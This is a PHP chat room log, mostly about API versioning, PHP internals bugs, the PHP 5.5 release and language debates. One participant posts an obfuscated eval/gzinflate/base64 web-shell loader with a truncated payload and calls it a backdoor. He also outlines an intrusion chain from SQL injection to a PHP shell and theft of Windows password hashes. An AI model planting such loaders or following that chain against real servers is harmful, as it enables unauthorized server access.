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@Baba indeed, must be either rounded or used as bool
@kaᵠ +1 for the attempt
@m59 One thing to remember is that you need to version your API somehow.
Q: Best practices for API versioning?

Swaroop C HAre there any known howtos or best practices for web service REST API versioning? I have noticed that AWS does versioning by the URL of the endpoint. Is this the best way?

@Baba written mostly for the workarounds, those are still sound, ty:)
so that I can change it in the future and keep the old one in tact, yes?
Take off that question mark, lol. It is yes.
Any recommendation for a good face recognition solution ?
@Baba NSA/CIA :P
@kaᵠ lol
I could jump as much as 7 spots tonight in the overall rep-league...
pittpatt.com has taken over by google
don't know any credible solution i can use
@ircmaxell wrote some fancy answer today?
nah, just a few small ones
and got a bunch off my Micro-Optimization rep-whoring post
I now need only 19 more upvotes to populist over jon skeet!!!
What's the best way to encode php source code?
I can't seem to get it to come out right using base64_encode() and then decoding it. Things seem jumbled.
@Jhawinsss Don't?
@Jhawinsss you mean obfuscate? :p
@cspray Great answer. Thanks.
@Mr.Alien Yeah, that's a better word for it haha.
@Jhawinsss write code like you don't mean it :)
No. With precision 0 we have 0.9.php.net/manual/en/ini.core.php#ini.precision is not clear enough; longer explanation: PHP uses his own implementation of ((v)s)printf string parsing. The mode %H is used in the format string: it calls with the parameter mode set to 2 the function zend_dtoa in which documentation is indicated: [mode] 2 ==> max(1,ndigits) significant digits. This gives a return value similar to that of ecvt, except that trailing zeros are suppressed. (see: lxr.php.net/xref/PHP_TRUNK/Zend/zend_strtod.c#1457)) That's why precision=1 == precision=0. — bwoebi 14 secs ago
@kaᵠ Haha. I'd rather have my clean code before-hand.
Fatal error: fatal flex scanner internal error--end of buffer missed in /in/YbCMB on line 4 <-- That's new!
why does PHP add an %H format string specifier for it's own ((v)s)printf implementation?
no idea
@ircmaxell looool? xDDD
@ircmaxell wow
hrmm...interesting that removing the comment "fixes" it
@ircmaxell or why does it have for %G another implementation when precision = 0 as the C standard (For G specifier: This is the maximum number of significant digits to be printed. -> there is no special case for zero. So I'd assume for zero it should print … nothing?)?
you got me...
and now it works: 3v4l.org/R3AVS
@kaᵠ Yep I noticed that too
You don't even need a "real" comment...just // on the last line with no line break causes the error
and please update the docs at php.net/manual/en/ini.core.php#ini.precision to state that with precision 0 it's the same as with precision 1. because this just confused me…
@cspray i added a newline after the original comment
@kaᵠ yea
m slleepy
this is fine though 3v4l.org/TcQ2u
and this: 3v4l.org/Spdi3
@kaᵠ Still getting error on thsi one
seems as if PHP 5.1.0 doesn't like files ending with comments…
@cspray was fine when first writing it, now doesn't work...
to sum it up: 3v4l.org/VmD3D
yellow HaaPee
How about this for obscuring code?
 $s_pass = "0de664ecd2be02cdd54234a0d1229b43";   $s_func="cr"."eat"."e_fun"."cti"."on";$JHAW=@$s_func('$x,$y','ev'.'al'.'("\$s_pass=\"$y\";?>".gz'.'inf'.'late'.'( bas'.'e64'.'_de'.'co'.'de($x)));');@$JHAW("7f1neyO3sigKf....//wE=",$s_pass);
dunno, not sure at this point...
@Jhawinsss to obscure use invisible unicode characters as variable identifiers :-)
Looks ridiculous. But it actually works.
Seriously. If they already have access to your source code they're gonna be able to figure out your obfuscation.
and function names etc.
@cspray There's 3 methods to obscuring here. Within the base64 string is another eval string, then back to something somewhat similar to this. And so on.
@Jhawinsss why!?!?!?!?!
@Jhawinsss All that does not matter. You gain so very little there
Further more
So, yes, you could figure it out. It wouldn't be worth the time it would waste in the end.
We can see what your'e doing
@cspray I know you can see. That's why I posted it?? I'm not gaining anything but obscuration. Good obscuration.
I have a reason to want this source hard to get in to.
@Jhawinsss 99% of the time when somebody obfuscates his code it indeed is not worth the time, not because it takes time to obfuscate it, but because people who think it's a good idea usually produce crap code to begin with
@PeeHaa埽 It's not a production script or anything. This is a good idea in my situation.
Obfuscate your code if you want to
I just don't think you'll get any advice from this room in doing so
Think of the few situations (if there are more than 1...).
I can't think of any reason why you'd write the code you just did.
I'm not asking for advice. I'm just talking about it...
@cspray Backdoor.
And I'm pretty sure most everybody here will tell you that it is not a good idea
It's for "Pentesting," obviously I don't want the other party to know what's in this script.
are rss feeds still in?
dope, itunes, what am I saying.
What would you do? http://t.co/eWMgcLZnEZ
@ircmaxell Not that much :P
back away slowly
If my api is already boss at retrieving things, could I also make it put out rss? @rdlowrey
@PeeHaa埽 I don't produce crap PHP, for the record. I produce crap JS.
@Jhawinsss You and me both
@Jhawinsss don't worry, rest of the world also does that
Hahaha. I just enjoy and understand PHP more. JS is weird... But it's cool too.
@Jhawinsss no wonder. with crap you can only produce crap. (my js is also a bit crappy)
Hahahahahaha yeah... The PHP room dislikes JS and the JS room dislikes PHP usually.
@m59 Yep. Just ask API users to specify a header like this:
Accept: atom/rss;q=1, application/json;q=0.5, */*;q=0.1
And negotiate the content type based on the Accept header.
@Jhawinsss Not the people I always talk to tbh
Can that be submitted to itunes, though??
Yeah? Well I must be wrong then.
Don't they require just a url?
@Jhawinsss did you expect something else? people who write with a crappy language aren't able to like a not-so-crappy language like PHP.
@Jhawinsss I like them both :)
@Jhawinsss I dislike PHP as a language, that said, a lot of people here can write very pretty PHP code and also I like the room.
I like the fact that I have actual control over the server with PHP. JS can play with the browser... PHP can access cmd, or shell ;)
@m59 I have no idea what iTunes does or doesn't require. I was just saying that ideally if you want to serve different content type representations of the same resource then the Accept header and content negotiation are the way to go.
@bwoebi any facial recognition recommendation ? Its does not have to be PHP but with good SDK or API
@BenjaminGruenbaum Haha you always end up here after I mention the JS room.
@Jhawinsss I was here before :P
@Baba never needed such a thing... (so cannot recommend one)
@bwoebi ok
or I should say, I'm pretty sure that iTunes will only take a url, so would it be ok if I did it differently? api/podcasts?rss=true or something?
@Jhawinsss PHP's SAPI does a bunch of voodoo unless you know it very well and it lacks some control you as a user should have. There are alternatives but I doubt you, or most people are using them. In nodejs that's not a problem but it makes development a lot harder - especially if you're just starting.
@BenjaminGruenbaum if PHP lacks something, you can easily write your own extension :-)
I've never touched with nodejs... You guys mention it all the time, though, so I'm curious.
what you cannot do with js for example.
@m59 I'm saddened if iTunes is in fact ignorant of proper HTTP usage. However, if that's the case then yes, I would do something like /api/podcasts/someId?format=rss
I know I could be biased and all since I learned js first, but it just seems so much more intuitive..
@bwoebi Of course you can...
@BenjaminGruenbaum (I mean in browsers, not nodejs)
I've not written much in JS that I'm actually proud of. The same can't be said about PHP. Plus, it seems like everything I ever do in JS has already been done, better.
OOP and encapsulation are just a headache in php for me.
@bwoebi Then that's not a correct comparison imho. You're comparing a technology that's designed to restrain you as a developer for security with one that doesn't.
^^ I agree.
They can't be directly compared....
@BenjaminGruenbaum It's not fair, but with JS you cannot do everything what you want in browsers.
@Jhawinsss I can't feasibly use node for now, but MAN is it awesome. It's JUST AWESOME.
@m59 What? OOP makes your life a lot easier in PHP, being able to apply oop principles in PHP really improved it.
@bwoebi What can you do to a browser in PHP that you can't in JS?
@m59 the latter, yes. but OOP generally is a very nice feature in PHP
@bwoebi Of course, then again in PHP you can't do anything in browsers (unless someone ported it? wouldn't surprise me.. ). In nodejs you can do whatever in the backend, including running PHP code.
@BenjaminGruenbaum Well, I haven't had a need for inheritance or anything to that effect. It's just the structure of classes that kills me.
@Jhawinsss In a sane way?
@BenjaminGruenbaum This was my point above.
@Jhawinsss I'm not disagreeing :)
Neither was I :)
Hahaha. Smoke.
I think I'm stuck on thinking of classes like js objects (since that's all I know)
@m59 I'm not a huge fan of inheritance in general, but it has a lot of use cases, interfaces are really important though.
All agree, yet everybody argues :)
I'm probably just using classes for namespacing, like a dummy.
@m59 Then it's worth learning. JS does very solid OOP imo, but it's very different from how other languages do it. Consider learning how OOP works in other languages.
in js that = same thing.
@BenjaminGruenbaum the problem of js is it's syntax and it's scoping ._.
The pro-ness of js is its scoping, imo, lol.
@bwoebi In particular the this scoping ^^
and it's not interesting that you can do it with node.
@bwoebi I disagree, I like JS's syntax and function scoping makes a lot of sense, then again you can use CoffeeScript that really changes both but compiles really transparently to JS.
@NikiC You mean self right? ;)
@bwoebi That's because you are not a node developer ;)
@BenjaminGruenbaum Btw, usually node.js is totally irrelevant on any js discussion
The one thing I miss for than anything ever from js is this:
It's just such a tiny niche
@NikiC Why? I use nodejs a lot, I don't think it's a tiny niche
@BenjaminGruenbaum javascript's closures are always importing the whole scope. that sucks.
Sure there is more clientside code, but you can't compare php to JS in terms of usage (and not language semantics) outside of that scope.
var foo = function() {
 //do stuff

foo.bar = function() {
  //yay for nested stuff
@bwoebi JavaScript closures are awesome, they're the best closures I know (maybe except C#'s).
in PHP I can define WHAT I want to import by ref and what not.
@bwoebi Yeah, that's pretty stupid imo. Why would I want to type it all out?
@BenjaminGruenbaum But you can't compare node.js with vanilla PHP in that scope either. You could only compare node.js with a similar framework in PHP (e.g. react or what rdlowrey is writing)
I do agree that JS has a pretty high learning curve, it's one of the harder languages to master properly imo.
Would it summarize what I am saying if I just said that I prefer js because functions are objects? Doesn't that just make it more naturally object oriented?
@m59 You can use functions as objects in PHP IIRC
@NikiC: it fixes the segfaults, but I think it exposes a bigger problem
Or is that php 5.5?
If you need so much variables, you aren't designing your code well I think :-)
because it only works if I put (handle) > 0 && (handle) < EG(objects_store).size into the GC_OBJECT_HANDLE_VALID()` handler
@bwoebi What do you mean? Why would I have 'excess variables' ?
which tells me that somewhere something is messing with a zval's object handler...
which is bad
@ircmaxell that doesn't make sense
@BenjaminGruenbaum I mean, you never should need in a closure so much imported variables.
@NikiC tell me about it... That indicates that something is writing to a zval directly, or a buffer overflow somewhere
@bwoebi So... just don't use them?
In JS closures are expressive and powerful by default, like in C#, or Ruby, unlike Python and PHP.
I think the way JS implements them is just harder to implement
PHP also scares me. Because I know what I can do to someone else's server with it. If someone were to do the same to me...
@Jhawinsss What?
@Jhawinsss Huh?
hi @PeeHaa埽
@Lusitanian Yo dawg
and congratulations @LeviMorrison
The secret to avoiding any pointless discussions about languages/... is understanding this:
Yeah, iTunes only accepts a url, no headers (unless there's some fine text in the docs locked away out of the reach of google)
Language quality and language popularity are only weakly correlated
@PeeHaa埽 how to communicate regarding oauthlib?!1
It's not that hard to find an sql injection hole. Once you find that you can write files to the server (with MySQL anyway...). You can write a script to give you eval. Then use that to write a PHP shell (What I was obscuring earlier...) and from that you have an insane amount of access to someone's server already. If it's windows, you can steal SAM hashes and find the admin password. Then you have administrative CMD access to the server.
@Lusitanian We can start a new room here on so :)
@PeeHaa埽 ah right. okay cool
1 sec let me set it up
On every server I've ever used a PHP shell on, I've had read-only access to all of system32.
@Jhawinsss SQL Injection is not something that is susceptible to PHP only. What you just described can be applied to any server side language.
@Jhawinsss Why would it have an SQL injection hole? If the coder is competent they would use prepared statements that mitigate that.
@Jhawinsss system32... nuff said
@cspray Right, the sql injection wasn't the point. That's just the first step.
@BenjaminGruenbaum we were wondering why you were not responding... I see how it is.... you left us for "PHP" :(
@rlemon I'm in 3 other rooms actively talking too. Got to use them 3 monitors for something. I am responding though
@Jhawinsss But what does any of that have to do with PHP? How is it the languages fault that application code isn't written securely?
I wasn't saying anything about PHP and sql injection being related or explicit to one another. I just meant if you find any way to write to the server you're golden.
@BenjaminGruenbaum I'm trying to beat off Demorus for you
in JavaScript , Mar 13 at 1:40, by rlemon
(Random Fact, when rlemon was 13 he pooped on a slide. he isn't proud of it, but he felt it was time to confess. I'm sorry slide.)
Just thought everyone here should see that.
@cspray It isn't. I didn't say anything was it's fault. I love that fact that you can do this hahaha. It just worries me that someone else may do the same to me one day.
@PeeHaa埽 access requested
@cspray I think older versions of PHP (like 4) had a real problem with sql injection (well, not the language as much as the db drivers it shipped with)
I've never used any other backend to gain illegitimate access to a server. Or even to mess with my own server. So I wouldn't know how much damage can be done in other languages.
@BenjaminGruenbaum That's true. Absolutely! But it isn't like that now..
@Jhawinsss PHP is the most popular backend, and it's also the most widely used by amateurs.
@BenjaminGruenbaum Sure. But, again, you can write insecure application code in any language and any version. Why say "PHP scares me" when really you meant "incompetent app developers scare me"?
I started with Perl and PHP :( Pity me
There were/are exploits to other technologies all the time, Java backends, Rails, even node already had its share of security holes.
@cspray Because PHP's larger portion of tutorials teach bad habits in really risky notation. While it's possible to write bad code in any language, the PHP ecosystem sure made it easier. I think it's getting better though.
@BenjaminGruenbaum Exactly.
@cspray I'm not saying it's your fault, or an inherent problem with PHP itself today.
@BenjaminGruenbaum I get what you're saying and to an extent agree with you.
@BenjaminGruenbaum Yes. It's a relatively easy language to start with and there are lots of (super terrible) resources. I blame both these things
I don't know. I just see people blaming PHP because they followed poorly written, out of date tutorials. I'd just like to see somebody actually take some personal responsibility and stop trying to pass the buck off on the language every time they do something stupid with it.
Man, I love issuing code tests to a "senior" dev and getting back results that tag him squarely as a junior/mid-level. Senior devs don't mix display logic and business logic...
Not that PHP doesn't have problems
Because it does
@PeeHaa埽 Also, the 'standard' way to write PHP apps is pretty bad. Good developers are not susceptible to it, but it's there.
@Charles what "senior devs" would those be ?
is it possible to install mail server on vps with free domain services?
@tereško A guy found through a recruiter. It's hard finding PHP devs in Seattle. :/
@NikiC Language quality and language usability are also only weakly related winestockwebdesign.com/Essays/Lisp_Curse.html
@microsoftarmy should be
that's in the case if you can control your DNS entries
you will need to add an MX entry
@Charles , in my experience "senior developer" is the guy how made the mess in the first place and now is way too invested in it to admit how wrong it all is
@tereško That's one possible interpretation. Damn, though, I thought I was the most bitter, jaded one in here... ;)
Also @Baba, I thought that OpenCV was basically the best thing in town for face recognition? If there aren't PHP bindings for it, I know there are Python bindings, and that's nothing a little proc_open or some Gearman can't fix...
also , OpenCV sucks
it's outdated as hell .. at least on freebsd
What's the new hotness?
@Charles na its more complex , slow and outdated ....
Eh, last stable release is last year...
@tereško thanks, i read about mx right now
@Charles Developing a solution for child safety so i need the best
@Baba Let us know what you find!
@Charles Reviewing some ... but what i found out to far is that i might have to use more than 1 technology then implement push - subscribe to enroll and match at the same time
@Charles Yeah i would let you know .. i would also let you test when the application is complete for constructive criticism
posted on June 20, 2013

The PHP development team is proud to announce the immediate availability of PHP 5.5.0. This release includes a large number of new features and bug fixes. The key features of PHP 5.5.0 include: Added generators and coroutines. Added "finally" keyword. Added simplified password hashing API. Added s

php.net does not show the news
@TimWolla its still propagating ... takes some time
@Baba Nifty. If it's really for child safety, I'll just have to place my own rugrats in peril. ;)
@Charles Yeah ...... added you to testing list .. we should be ready in 3 months max
@Baba Nifty!
@Charles thanks
Xeround is very disappointing .. am not sure if people would ever trust them with their data again
HN on 5.5. Prepare for the anti-PHP horribles.
Those people advertising their frameworks
> Ww also have a modern framework for php. Everyone should try laravel.com , such a fresh air into php development
shoot it
@Charles Doesn't count
I hate it when people post "PHP x.y.z released" posts based on the tag, rather than the actual release
@PeeHaa埽 are you using larvel ?
@NikiC While this is true, it's still always horrible/delightful to see the wankfest at HN over PHP.
@Baba hells no
@Feeds @NikiC seems rather official ;)
@PeeHaa埽 i see to many singleton .. what do you use ?
what, php just got finally?
@tereško need a light simple framework .... any suggestion ?
@BenjaminGruenbaum Yes
Finally they got finally
(no pun intended :P)
Only took around 5 years of arguing
@Baba Silex ... or wait till i finish mine =P
@TimWolla pffft, that pun was so totally intended
@Baba I have to use Zend in some projects at the office. But for personal projects mostly use something cooked myself
@cspray Lies!
@TimWolla Bad puns do not lie!
@tereško lol ... link ?
@PeeHaa埽 yeah i used my own solutions but now that i have to work with larger team ... i need something they are familiar with .. simple and light
> PSR-0 is widely adopted by anything relevant in the PHP ecosystem. Sure, those style guides might not be pitch-perfect but it is time for PHP to step it up and get some uniformity in their codebase. At least adopting PSR-0 would have been a great step towards that.
Guys i am developing twitter clone in CI , i need help with database
I have no idea what PSR is but I think PHP should really put it in core ....
@Baba you mean silex.sensiolabs.org ?
@PeeHaa埽 Yeah, of course. And I think we should include several other important things as well
Like a chat software!
@tereško is that yours ?
@TimWolla lol
@tereško where is the link to yours .. so that i can follow progress
@Baba mine is this one, but i have not had time to work on it in 3+ month
What? It makes development so much easier. Just use: new Chat(); and everything works like a charm.
fortunately i handed in my resignation , so i will soon start working on it again
@tereško Gratz
@tereško .. watching already .. let see what you would come up with
for the main time .. any recommendation ?
@Charles too many boilerplate code and i really don't need backward compatibility
@Charles lol
@Tejas the use-case for CodeIgniter (I'm assuming that you did not mean "continuous integration") are small "mayfly projects", not something like twitter
LOL its fine , i am just doing for practice , and i got the answer .
@ircmaxell I think you should adjust the example on de3.php.net/manual/en/function.password-hash.php to remove the manual salt specification. And maybe also of the cost.
Anyone with PHPUnit knowledge whom I can convince to look at my question?
Q: Depending on inherited test

JasperI have two classes, Parent and Child: class Parent { public function parentAction() {...} } class Child extends Parent { public function childAction() {...} } Now I am testing these with PHPUnit. (I'm not truly unit-testing, but for the purpose of the question, I guess you could assum...

never trust benchmarks which you did not forge yourself
@tereško hehehe
@Baba I may be wrong, but it looks like those numbers are from single runs rather than averages...
@Jasper reviewing the benchmark code at the moment github.com/bzick/cytro/tree/master/benchmark
I will run the benchmark myself in a moment
just waiting for composer to finish
@TimWolla Nice ....
PHP errors and Exceptions in the benchmark
@Baba I took a look at the code myself, but at the point it started using passthru to call other parts of the code I sort of lost track...
@TimWolla i need it run it my self ... one moment
gist.github.com/max-m/b30799625c34d3e7f5ef (ignore the wrong github username, i ran my gist script from a friend's server)
@TimWolla that is a log Warning .... one moment
Ah, i had to create some folders manually
It is running now
@NikiC we did on the english version, no?
@ircmaxell huh?
I thought the manual specification was removed... Crap... Will adjust
@TimWolla waiting for composer
@TimWolla what do you think so far ?
It seems that you cannot extend cytro from a quick glance
At least it is no nice OOP
And parts of the documentation is Russian
I don't understand Russian.
@TimWolla Just Observed that too
Hi there, just a small question:
is there a way/tool to publish a webpage to a php web space with limited rights instead of manually copy paste the files? Best option would be to fetch latest version from github or something like that (no rights to install git or anything, jsut plain php)
@roccosportal.com What about fetching the tar / zip from github and extracting it after receiving a notice by a POST Receive hook?
@TimWolla would there be a option to not overwrite some config files?
@roccosportal.com Keep the config files out of the repository
Post receive hook maybe was the keyword --> help.github.com/articles/post-receive-hooks
hmm, but actually I only want to fetch the content certain times (after a stable release)
so probably a simple php file with extracting the zip from github could serve my needs
@roccosportal.com Use the github api to check whether an appropriate tag exists
@PeeHaa埽, looks like you're shadowbanned on HN.
(gdb) print (zval_gc_info) *pz
$1 = {z = {value = {lval = 31337624, dval = 1.5482843440690148e-316, str = {val = 0x1de2c98 "0", len = 20823032}, ht = 0x1de2c98, obj = {
        handle = 31337624, handlers = 0x13dbbf8}}, refcount__gc = 4294967295, type = 5 '\005', is_ref__gc = 0 '\000'}, u = {
    buffered = 0x2, next = 0x2}}
Is it just me or is programming the worst discipline in the world in terms of its adherents throwing out wild, unsubstantiated claims about what their code/library does using flowery buzz words? And it seems like PHP programmers are the worst.
@ircmaxell So, which of those is the problem? ^^
posted on June 20, 2013 by Evert Pot

PHP 5.5 has been released! Quite exciting stuff, and pretty great to see the pace of new releases. Props to the dev team! Hopefully distros pick this version up quickly as well, so we can start making use of these fancy new features. The highlights: Generators Generators provide an extremely easy way to create iterators. They introduce a new yield keyword, which kinda works like return,

Thanks Feeds!
@NikiC which isn't? the handle is way too high (31 million objects? I don't think so)
refcount is WAY too high
I propose banning Feeds for repeating himself.
the pointers, no idea...
@rdlowrey Nope, PHP programmers are not the worst there. PHP is not hip enought for flowery buzz words ;)
@rdlowrey No, it's just how the world works. In most subjects you don't catch it, though.
@ircmaxell yeah, I get that, but from that I don't immidiately see where the problem is ^^
Oh, I'm not seeing why that's happening
just that it's happening
@BenjaminGruenbaum but we need them (or we define XYZ functions what's ugly too.)
If your github README.md hammers me with unsubstantiated marketing-speak like "lightning fast" I'm clicking away. Like, immediately.
@rdlowrey There's a missed joke in there. Something like "I'm clicking away lightning fast."
Every time I tweet (not often) I rue the lack of an edit button. And the delete-replace method is too much effort.
Hi guys, i have a question that stems from JS and HTML 5 canvas, i want a button to save an image in my files and offer the user to download the image.
*by my files i mean the location where the HTML and stuff is saved, im a folder calld user images
@deep Is there an appropriate SO question?
I havent checked yet,
I suggest creating one and linking to it. Answers get lost in a chat.
im question banned
Q: Capture HTML Canvas as gif/jpg/png/pdf?

ParandIs it possible to capture or print what's displayed in an html canvas as an image or pdf? I'd like to generate an image via canvas, and I'd like to be able to generate a png from that image.

Or is the server side part necessary?

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